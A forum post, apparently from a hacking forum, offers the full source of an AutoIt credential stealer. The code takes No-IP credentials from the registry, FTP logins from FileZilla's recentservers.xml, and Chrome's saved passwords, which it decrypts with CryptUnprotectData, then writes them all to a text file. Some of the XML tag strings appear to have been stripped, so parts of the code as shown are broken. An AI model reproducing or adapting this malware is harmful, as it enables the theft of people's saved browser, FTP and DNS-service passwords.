Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Autoit Stealer Chrome/NOIP/FileZilla PASSWORD

FUD

By INACTIVE FUD
in AutoIT

 Share

Recommended Posts

FUD Amateur

INACTIVE FUD

Posted
Posted (edited)

I give you today verry nice code

 

this code get password of no-ip/chrome/filezila

 

 

 

code:

#comments-start

++++++++++++ autoit stealer

+++++++++ write by; njq8

#comments-end

#include

#include

 

$file=@scriptdir &"\passwords.txt"

if fileexists($file) then filedelete($file)

$file_handle= fileopen($file ,1)

if $file_handle<>-1 then

filewrite($file_handle,noip() & chrome() & filezilla() )

fileflush($file_handle)

fileclose($file_handle)

endif

 

func noip()

$usr=regread("hkey_local_machine\software\vitalwerks\duc","username")

if $usr="" then return ""

$pwd=regread("hkey_local_machine\software\vitalwerks\duc","password")

return "url:

This is the hidden content, please
" & @crlf & "usr: " & $usr & @crlf & "pwd (base64): " & $pwd & @crlf & @crlf

endfunc

 

func filezilla()

local $pwds,$h,$fn=envget("appdata") &"\filezilla\recentservers.xml"

if fileexists($fn)=false then return ""

$h= fileopen($fn,0)

if $h=-1 then return ""

$host=""

$port=21

$usr=""

$pass=""

while true

$line= filereadline($h)

if @error = -1 then exitloop

if stringinstr($line,"") then

$usr=""

$pass=""

$port=21

$host= stringmid($line,1,stringinstr($line,"")-1)

$host= stringmid($host,stringinstr($host,">")+1)

endif

if stringinstr($line,"") then

$port= stringmid($line,1,stringinstr($line,"")-1)

$port= stringmid($port,stringinstr($port,">")+1)

endif

if stringinstr($line,"") then

$usr= stringmid($line,1,stringinstr($line,"")-1)

$usr= stringmid($usr,stringinstr($usr,">")+1)

endif

if stringinstr($line,"") then

$pass= stringmid($line,1,stringinstr($line,"")-1)

$pass= stringmid($pass,stringinstr($pass,">")+1)

endif

if stringinstr($line,"") then

$pwds = $pwds & "url: Ftp://" & $host &":" & $port & @crlf & "usr: " & $usr & @crlf & "pwd: " & $pass & @crlf & @crlf

endif

wend

return $pwds

endfunc

func chrome()

local $q, $r, $pwds,$fn=envget("localappdata") & "\google\chrome\user data\default\login data"

if fileexists($fn)=false then return ""

_sqlite_startup()

_sqlite_open($fn)

_sqlite_query(-1, "select * from logins;", $q)

while _sqlite_fetchdata($q, $r) = 0

$pwds = $pwds & "url: "& $r[0] & @crlf &"usr: "& $r[3] & @crlf &"pwd: "& uncryptrdppassword( $r[5]) & @crlf & @crlf

wend

_sqlite_close()

_sqlite_shutdown()

return $pwds

endfunc

 

func uncryptrdppassword($bin)

;this func from >>

This is the hidden content, please

local const $cryptprotect_ui_forbidden = 0x1

local const $data_blob = "int;ptr"

 

local $passstr = dllstructcreate("byte[1024]")

local $datain = dllstructcreate($data_blob)

local $dataout = dllstructcreate($data_blob)

$pwdescription = 'psw'

$pwdhash = ""

 

dllstructsetdata($dataout, 1, 0)

dllstructsetdata($dataout, 2, 0)

 

dllstructsetdata($passstr, 1, $bin)

dllstructsetdata($datain, 2, dllstructgetptr($passstr, 1))

dllstructsetdata($datain, 1, binarylen($bin))

 

$return = dllcall("crypt32.dll","int", "cryptunprotectdata", _

"ptr", dllstructgetptr($datain), _

"ptr", 0, _

"ptr", 0, _

"ptr", 0, _

"ptr", 0, _

"dword", $cryptprotect_ui_forbidden, _

"ptr", dllstructgetptr($dataout))

if @error then return ""

 

$len = dllstructgetdata($dataout, 1)

$pwdhash = ptr(dllstructgetdata($dataout, 2))

$pwdhash = dllstructcreate("byte[" & $len & "]", $pwdhash)

return binarytostring(dllstructgetdata($pwdhash, 1), 4)

endfunc

Edited by sQuo
added original coder
Link to comment
Share on other sites
  • 3 weeks later...
  • 3 weeks later...
  • 3 months later...
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.